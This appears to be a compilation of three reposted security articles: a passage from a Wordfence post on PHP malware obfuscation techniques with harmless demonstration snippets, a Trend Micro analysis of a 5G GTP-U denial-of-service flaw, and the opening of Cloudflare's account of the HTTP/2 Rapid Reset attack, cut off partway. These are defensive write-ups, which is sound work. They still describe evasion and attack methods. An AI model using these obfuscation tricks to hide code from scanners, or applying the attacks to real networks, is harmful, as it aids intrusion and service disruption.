PHP has the ability to use variables to store function names as variables and then invoke those functions using the variable. This is widely used by legitimate software, but can also be combined with several other techniques, such as string concatenation, in which case it is often an indicator of malicious activity. For instance, the following code snippet prints out “Hello, World!”:

123<?php $hello='pri'.'ntf';$string='Hello, World!';$hello($string);

This can also be combined with dynamic function invocation using methods such as call_user_func, which accepts a function for its first parameter and any arguments to be passed to that function in subsequent parameters. As with variable function names, this is widely used in legitimate code, but it can still make analysis more difficult, especially for automated tools looking primarily for more basic function call syntax. For example, the following code snippet prints out “Hello, World!”:

1234<?php $hello='pri'.'ntf';$string='Hello, World!';$call='call_user_func';$call($hello, $string);

Finally, PHP also allows for anonymous functions, which are exactly what they sound like – functions without a name. These can be combined with variable assignment as shown:

12345<?php$hello= function() {    printf("Hello, World!");};$hello();

While anonymous functions are widely used in legitimate code, it is possible to use them in combination with other features to make it more difficult for automated scanning tools or human analysts to keep track of code flow and as such are useful for obfuscation.

We’ve begun to combine obfuscation layers in our examples to provide a better picture of the type of obfuscation often found in the wild, and there’s still more to come.

GOTO Labels

One of the oldest and most basic code functions is the goto statement. While some legitimate software still uses GOTO statements, the functionality is considered poor coding practice and is not widely used, though it reflects how the code operates at a fundamental level far more accurately than more modern syntax. Its primary use in obfuscation is similar to comment abuse in that it breaks up the code so that it is more difficult to determine the control flow.

For example, the following code snippet prints out “Hello, World!” if and only if $_GET['input'] is present and set to ‘hello’, otherwise it prints “Sorry”:

123456789101112131415<?php $hello='pri'.'ntf';$string='Hello, World!';if(isset($_GET['input']) && $_GET['input']=='hello'){gotoprintyes;}elsegotoprintno;printyes:echo"Hello, World!";gotoend;printno:echo"Sorry";end:?>

Include/Require of non-PHP files

PHP uses the include and require functions to include and execute code located in a separate file. This is almost universally used, and occasionally the .inc extension is used instead of PHP for files to be included. However, one particular feature that is ripe for abuse is that PHP will include files with any extension and execute them as code. This allows attackers to upload the bulk of their malicious code as a file with an allowed extension, often an image extension such as .ico or .png, and then simply include that file from a loader file with a PHP extension. Inclusion of files without a .php or .inc extension is thus almost always an indicator of malicious activity.

For instance, take the following set of files:

loader.php:

1<?php include('hello.ico');

hello.ico:

1<?php echo"Hello, World!";

This will print out “Hello, World” when loader.php is executed, even though hello.ico does not have a PHP extension and would not run as PHP if accessed directly.

Putting it All Together

Here’s an example that makes use of everything we’ve learned today apart from including files:

1234567891011121314151617181920<?php$string=/*blah*/"Wow, what a cool Helpful research device!"/*blah*/;$mashed=$string[(160/4)]./*blah*/$string[34]./*blah*/$string[(5*3)]/*blah*/.$string[(5*5)]/*blah*/.$string[(12-11)]./*blah*/$string[(5-5)]./*blah*//*blah*/$string[(2+2)]./*blah*/$string[(1+2)]./*blah*/$string[(5-4)]/*blah*/.$string[(29-10)]./*blah*/$string[(10+9)]./*blah*/$string[(20-2)]/*blah*/.$string[(15+2)];function/*blah*/echostring(/*blah*/$str/*blah*/){    echo/*blah*/$str;    return/*blah*/;}$rev/*blah*/=/*blah*/function($str){    return/*blah*/strrev($str);};goto/*blah*/dostuff;echo/*blah*/"That didn't work!";dostuff/*blah*/:    call_user_func(/*blah*/'echostring',/*blah*/$rev(/*blah*/$mashed));

It begins with comments breaking up the code as well as the concatenation and string indexing techniques we covered earlier, which assigns “Hello, World!” in reverse, or “!dlroW ,olleH” to the $mashed variable.

A quick glance at the code might lead you to believe that it outputs “That didn’t work!” but thanks to the goto statement that line of code is skipped – such misleading uses are par for the course with malware that uses goto statements.

In the dostuff section, we use call_user_func to call the echostring function, which really just does the same thing as echo but serves as an additional layer of obfuscation to untangle, especially if the function were to be given a less friendly name. The echostring function is fed the output of the anonymous function assigned to the $rev variable, which again simply performs a str_rev on the input. The result is that $mashed is reversed and echoed out as “Hello, World!”. While we have kept the function and variable names relatively relevant for this example, there’s nothing preventing a malware author from naming these functions whatever they want, and indeed, misleading or nonsensical function names are more common than meaningful or useful function names in PHP malware.

Conclusion

In today’s post, we covered a number of the more creative, or “hacky” malware obfuscation techniques in widespread use, and showed examples of how they can be combined to make it difficult to analyze code functionality. All of these techniques can also be combined with the techniques in our previous post on malware obfuscation to make life even more difficult for analysts and security scanners. These two posts cover the most popular obfuscation methods used by PHP malware, but there are even more advanced and sophisticated techniques, including genuine encryption, which we will cover in our next article, alongside less commonly-used functionality.

PHP malware is constantly evolving, and our malware analysts release dozens of detection signatures every month, which can be used by the Wordfence scanner as well as by Wordfence CLI. While the vast majority of new signatures will only be made available to Wordfence PremiumWordfence CareWordfence Response, and the Paid Wordfence CLI Tiers, the free version of Wordfence and Wordfence CLI still offer excellent detection capabilities, and include our broadest signature set, which in our testing detects at least one indicator of compromise on more than 90% of infected sites. We also plan to periodically update our free signature set with signatures that detect the most widespread malware from our full signature set.

Once again, we encourage readers who want to learn more about this to experiment with the various code snippets we have presented. As always, be sure to be careful with any actual malware samples you find and only execute them in a hardened virtual environment, as even PHP malware can be used for local privilege escalation on vulnerable machines.

For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

Did you enjoy this post? Share it!

Source :
https://www.wordfence.com/blog/2023/11/know-your-malware-part-two-hacky-obfuscation-techniques/

Attacks on 5G Infrastructure From Users’ Devices

By: Salim S.I.
September 20, 2023
Read time: 8 min (2105 words)

Crafted packets from cellular devices such as mobile phones can exploit faulty state machines in the 5G core to attack cellular infrastructure. Smart devices that critical industries such as defense, utilities, and the medical sectors use for their daily operations depend on the speed, efficiency, and productivity brought by 5G. This entry describes CVE-2021-45462 as a potential use case to deploy a denial-of-service (DoS) attack to private 5G networks.

5G unlocks unprecedented applications previously unreachable with conventional wireless connectivity to help enterprises accelerate digital transformation, reduce operational costs, and maximize productivity for the best return on investments. To achieve its goals, 5G relies on key service categories: massive machine-type communications (mMTC), enhanced mobile broadband (eMBB), and ultra-reliable low-latency communication (uRLLC).

With the growing spectrum for commercial use, usage and popularization of private 5G networks are on the rise. The manufacturing, defense, ports, energy, logistics, and mining industries are just some of the earliest adopters of these private networks, especially for companies rapidly leaning on the internet of things (IoT) for digitizing production systems and supply chains. Unlike public grids, the cellular infrastructure equipment in private 5G might be owned and operated by the user-enterprise themselves, system integrators, or by carriers. However, given the growing study and exploration of the use of 5G for the development of various technologies, cybercriminals are also looking into exploiting the threats and risks that can be used to intrude into the systems and networks of both users and organizations via this new communication standard. This entry explores how normal user devices can be abused in relation to 5G’s network infrastructure and use cases.

5G topology

In an end-to-end 5G cellular system, user equipment (aka UE, such as mobile phones and internet-of-things [IoT] devices), connect to a base station via radio waves. The base station is connected to the 5G core through a wired IP network.

Functionally, the 5G core can be split into two: the control plane and the user plane. In the network, the control plane carries the signals and facilitates the traffic based on how it is exchanged from one endpoint to another. Meanwhile, the user plane functions to connect and process the user data that comes over the radio area network (RAN).

The base station sends control signals related to device attachment and establishes the connection to the control plane via NGAP (Next-Generation Application Protocol). The user traffic from devices is sent to the user plane using GTP-U (GPRS tunneling protocol user plane). From the user plane, the data traffic is routed to the external network. 

fig1-attacks-on-5g-infrastructure-from-users-devices
Figure 1. The basic 5G network infrastructure

The UE subnet and infrastructure network are separate and isolated from each other; user equipment is not allowed to access infrastructure components. This isolation helps protect the 5G core from CT (Cellular Technology) protocol attacks generated from users’ equipment.

Is there a way to get past this isolation and attack the 5G core? The next sections elaborate on the how cybercriminals could abuse components of the 5G infrastructure, particularly the GTP-U.

GTP-U

GTP-U is a tunneling protocol that exists between the base station and 5G user plane using port 2152. The following is the structure of a user data packet encapsulated in GTP-U.

fig2-attacks-on-5g-infrastructure-from-users-devices
Figure 2. GTP-U data packet

A GTP-U tunnel packet is created by attaching a header to the original data packet. The added header consists of a UDP (User Datagram Protocol) transport header plus a GTP-U specific header. The GTP-U header consists of the following fields:

  • Flags: This contains the version and other information (such as an indication of whether optional header fields are present, among others).
  • Message type: For GTP-U packet carrying user data, the message type is 0xFF.
  • Length: This is the length in bytes of everything that comes after the Tunnel Endpoint Identifier (TEID) field.
  • TEID: Unique value for a tunnel that maps the tunnel to user devices

The GTP-U header is added by the GTP-U nodes (the base station and User Plane Function or UPF). However, the user cannot see the header on the user interface of the device. Therefore, user devices cannot manipulate the header fields.

Although GTP-U is a standard tunneling technique, its use is mostly restricted to CT environments between the base station and the UPF or between UPFs. Assuming the best scenario, the backhaul between the base station and the UPF is encrypted, protected by a firewall, and closed to outside access. Here is a breakdown of the ideal scenario: GSMA recommends IP security (IPsec) between the base station and the UPF. In such a scenario, packets going to the GTP-U nodes come from authorized devices only. If these devices follow specifications and implement them well, none of them will send anomalous packets. Besides, robust systems are expected to have strong sanity checks to handle received anomalies, especially obvious ones such as invalid lengths, types, and extensions, among others.

In reality, however, the scenario could often be different and would require a different analysis altogether. Operators are reluctant to deploy IPsec on the N3 interface because it is CPU-intensive and reduces the throughput of user traffic. Also, since the user data is perceived to be protected at the application layer (with additional protocols such as TLS or Transport Layer Security), some consider IP security redundant. One might think that for as long as the base station and packet-core conform to the specific, there will be no anomalies. Besides, one might also think that for all robust systems require sanity checks to catch any obvious anomalies. However, previous studies have shown that many N3 nodes (such as UPF) around the world, although they should not be, are exposed to the internet. This is shown in the following sections.

fig3-attacks-on-5g-infrastructure-from-users-devices

Figure 3. Exposed UPF interfaces due to misconfigurations or lack of firewalls; screenshot taken from Shodan and used in a previously published research

We discuss two concepts that can exploit the GTP-U using CVE-2021-45462. In Open5GS, a C-language open-source implementation for 5G Core and Evolved Packet Core (EPC), sending a zero-length, type=255 GTP-U packet from the user device resulted in a denial of service (DoS) of the UPF. This is CVE-2021-45462, a security gap in the packet core that can crash the UPF (in 5G) or Serving Gateway User Plane Function (SGW-U in 4G/LTE) via an anomalous GTP-U packet crafted from the UE and by sending this anomalous GTP-U packet in the GTP-U. Given that the exploit affects a critical component of the infrastructure and cannot be resolved as easily, the vulnerability has received a Medium to High severity rating.

GTP-U nodes: Base station and UPF

GTP-U nodes are endpoints that encapsulate and decapsulate GTP-U packets. The base station is the GTP-U node on the user device side. As the base station receives user data from the UE, it converts the data to IP packets and encapsulates it in the GTP-U tunnel.

The UPF is the GTP-U node on the 5G core (5GC) side. When it receives a GTP-U packet from the base station, the UPF decapsulates the outer GTP-U header and takes out the inner packet. The UPF looks up the destination IP address in a routing table (also maintained by the UPF) without checking the content of the inner packet, after which the packet is sent on its way.

GTP-U in GTP-U

What if a user device crafts an anomalous GTP-U packet and sends it to a packet core?

fig4-attacks-on-5g-infrastructure-from-users-devices
Figure 4. A specially crafted anomalous GTP-U packet
fig5-attacks-on-5g-infrastructure-from-users-devices
Figure 5. Sending an anomalous GTP-U packet from the user device

As intended, the base station will tunnel this packet inside its GTP-U tunnel and send to the UPF. This results in a GTP-U in the GTP-U packet arriving at the UPF. There are now two GTP-U packets in the UPF: The outer GTP-U packet header is created by the base station to encapsulate the data packet from the user device. This outer GTP-U packet has 0xFF as its message type and a length of 44. This header is normal. The inner GTP-U header is crafted and sent by the user device as a data packet. Like the outer one, this inner GTP-U has 0xFF as message type, but a length of 0 is not normal.

The source IP address of the inner packet belongs to the user device, while the source IP address of the outer packet belongs to the base station. Both inner and outer packets have the same destination IP address: that of the UPF.

The UPF decapsulates the outer GTP-U and passes the functional checks. The inner GTP-U packet’s destination is again the same UPF. What happens next is implementation-specific:

  • Some implementations maintain a state machine for packet traversal. Improper implementation of the state machine might result in processing this inner GTP-U packet. This packet might have passed the checks phase already since it shares the same packet-context with the outer packet. This leads to having an anomalous packet inside the system, past sanity checks.
  • Since the inner packet’s destination is the IP address of UPF itself, the packet might get sent to the UPF. In this case, the packet is likely to hit the functional checks and therefore becomes less problematic than the previous case.

Attack vector

Some 5G core vendors leverage Open5GS code. For example, NextEPC (4G system, rebranded as Open5GS in 2019 to add 5G, with remaining products from the old brand) has an enterprise offer for LTE/5G, which draws from Open5GS’ code. No attacks or indications of threats in the wild have been observed, but our tests indicate potential risks using the identified scenarios.

The importance of the attack is in the attack vector: the cellular infrastructure attacks from the UE. The exploit only requires a mobile phone (or a computer connected via a cellular dongle) and a few lines of Python code to abuse the opening and mount this class of attack. The GTP-U in GTP-U attacks is a well-known technique, and backhaul IP security and encryption do not prevent this attack. In fact, these security measures might hinder the firewall from inspecting the content.

Remediation and insights

Critical industries such as the medical and utility sectors are just some of the early adopters of private 5G systems, and its breadth and depth of popular use are only expected to grow further. Reliability for continuous, uninterrupted operations is critical for these industries as there are lives and real-world implications at stake. The foundational function of these sectors are the reason that they choose to use a private 5G system over Wi-Fi. It is imperative that private 5G systems offer unfailing connectivity as a successful attack on any 5G infrastructure could bring the entire network down.

In this entry, the abuse of CVE-2021-45462 can result in a DoS attack. The root cause of CVE-2021-45462 (and most GTP-U-in-GTP-U attacks) is the improper error checking and error handling in the packet core. While GTP-U-in-GTP-U itself is harmless, the proper fix for the gap has to come from the packet-core vendor, and infrastructure admins must use the latest versions of the software.

A GTP-U-in-GTP-U attack can also be used to leak sensitive information such as the IP addresses of infrastructure nodes. GTP-U peers should therefore be prepared to handle GTP-U-in-GTP-U packets. In CT environments, they should use an intrusion prevention system (IPS) or firewalls that can understand CT protocols. Since GTP-U is not normal user traffic, especially in private 5G, security teams can prioritize and drop GTP-U-in-GTP-U traffic.

As a general rule, the registration and use of SIM cards must be strictly regulated and managed. An attacker with a stolen SIM card could insert it to an attacker’s device to connect to a network for malicious deployments. Moreover, the responsibility of security might be ambiguous to some in a shared operating model, such as end-devices and the edge of the infrastructure chain owned by the enterprise. Meanwhile, the cellular infrastructure is owned by the integrator or carrier. This presents a hard task for security operation centers (SOCs) to bring relevant information together from different domains and solutions.

In addition, due to the downtime and tests required, updating critical infrastructure software regularly to keep up with vendor’s patches is not easy, nor will it ever be. Virtual patching with IPS or layered firewalls is thus strongly recommended. Fortunately, GTP-in-GTP is rarely used in real-world applications, so it might be safe to completely block all GTP-in-GTP traffic. We recommend using layered security solutions that combine IT and communications technology (CT) security and visibility. Implementing zero-trust solutions, such as Trend Micro™ Mobile Network Security, powered by CTOne, adds another security layer for enterprises and critical industries to prevent the unauthorized use of their respective private networks for a continuous and undisrupted industrial ecosystem, and by ensuring that the SIM is used only from an authorized device. Mobile Network Security also brings CT and IT security into a unified visibility and management console.

Source :
https://www.trendmicro.com/it_it/research/23/i/attacks-on-5g-infrastructure-from-users-devices.html

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

10/10/2023

Lucas Pardue
Julien Desgats

Starting on Aug 25, 2023, we started to notice some unusually big HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long however, before they started to reach record breaking sizes — and eventually peaked just above 201 million requests per second. This was nearly 3x bigger than our previous biggest attack on record.Under attack or need additional protection? Click here to get help.

Concerning is the fact that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it’s not inconceivable that using this method could focus an entire web’s worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare’s existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see  CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This included every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a “wire format” for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

And the response would look like:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required; meaning that messages are exchanged serially and can not be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLFGET /page/2/ HTTP/1.1 CRLFHost: blog.cloudflare.comCRLFCRLF

With the responses:

HTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>CRLFHTTP/1.1 200 OK CRLFServer: cloudflareCRLFContent-Length: 100CRLFtext/html; charset=UTF-8CRLFCRLF<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.

Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resources fetching especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag, that when set to the value 1 (true), can trigger a state transition.

Let’s work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATEPRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the “open” state or in either of the “half-closed” states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness— which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let’s consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response and instead only responds to stream 3 and 5:

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A request stream that is canceled, rapidly transitions through the stream lifecycle. The client’s HEADERS with END_STREAM flag set to 1 transitions the state from idle to open to half-closed, then RST_STREAM immediately causes a transition from half-closed to closed.

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare’s reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server’s chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here’s an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I’ve used an off-the-shelf server without any mitigations; listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

It’s a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark’s Statistics > HTTP2 tool:

The first frame in this trace, in packet 14, is the server’s SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.

Interestingly, the RST_STREAM for stream 1051 doesn’t fit in packet 15, so in packet 16 we see the server respond with a 404 response.  Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client sent a lot more HEADERS frames than that. The client did not have to wait for any return traffic from the server, it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on it. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let’s dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our “business logic” proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy cannot connect anymore to its upstream proxy, this is why some clients saw a bare “502 Bad Gateway” error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence of that is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two hours while this was happening:

We worked to reduce this number dramatically in the following days, as detailed later on in this post. Both thanks to changes in our stack and to our mitigation that reduce the size of these attacks considerably, this number today is effectively zero.

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in a HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for a server’s SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so don’t tend to wait for server settings, which creates a bit of a race condition. Clients are taking a gamble on what limit the server might pick; if they pick wrong the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, with the hope that servers followed the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.

There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.

While responding to DoS attacks enabled by CVE-2023-44487, Cloudflare reduced maximum stream concurrency to 64. Before making this change, we were unaware that clients don’t wait for SETTINGS and instead assume a concurrency of 100. Some web pages, such as an image gallery, do indeed cause a browser to send 100 requests immediately at the start of a connection. Unfortunately, the 36 streams above our limit all needed to be reset, which triggered our counting mitigations. This meant that we closed connections on legitimate clients, leading to a complete page load failure. As soon as we realized this interoperability issue, we changed the maximum stream concurrency to 100.

Actions from the Cloudflare side

In 2019 several DoS vulnerabilities were uncovered related to implementations of HTTP/2. Cloudflare developed and deployed a series of detections and mitigations in response.  CVE-2023-44487 is a different manifestation of HTTP/2 vulnerability. However, to mitigate it we were able to extend the existing protections to monitor client-sent RST_STREAM frames and close connections when they are being used for abuse. Legitimate client uses for RST_STREAM are unaffected.

In addition to a direct fix, we have implemented several improvements to the server’s HTTP/2 frame processing and request dispatch code. Furthermore, the business logic server has received improvements to queuing and scheduling that reduce unnecessary work and improve cancellation responsiveness. Together these lessen the impact of various potential abuse patterns as well as giving more room to the server to process requests before saturating.

Mitigate attacks earlier

Cloudflare already had systems in place to efficiently mitigate very large attacks with less expensive methods. One of them is named “IP Jail”. For hyper volumetric attacks, this system collects the client IPs participating in the attack and stops them from connecting to the attacked property, either at the IP level, or in our TLS proxy. This system however needs a few seconds to be fully effective; during these precious seconds, the origins are already protected but our infrastructure still needs to absorb all HTTP requests. As this new botnet has effectively no ramp-up period, we need to be able to neutralize attacks before they can become a problem.

To achieve this we expanded the IP Jail system to protect our entire infrastructure: once an IP is “jailed”, not only it is blocked from connecting to the attacked property, we also forbid the corresponding IPs from using HTTP/2 to any other domain on Cloudflare for some time. As such protocol abuses are not possible using HTTP/1.x, this limits the attacker’s ability to run large attacks, while any legitimate client sharing the same IP would only see a very small performance decrease during that time. IP based mitigations are a very blunt tool — this is why we have to be extremely careful when using them at that scale and seek to avoid false positives as much as possible. Moreover, the lifespan of a given IP in a botnet is usually short so any long term mitigation is likely to do more harm than good. The following graph shows the churn of IPs in the attacks we witnessed:

As we can see, many new IPs spotted on a given day disappear very quickly afterwards.

As all these actions happen in our TLS proxy at the beginning of our HTTPS pipeline, this saves considerable resources compared to our regular L7 mitigation system. This allowed us to weather these attacks much more smoothly and now the number of random 502 errors caused by these botnets is down to zero.

Observability improvements

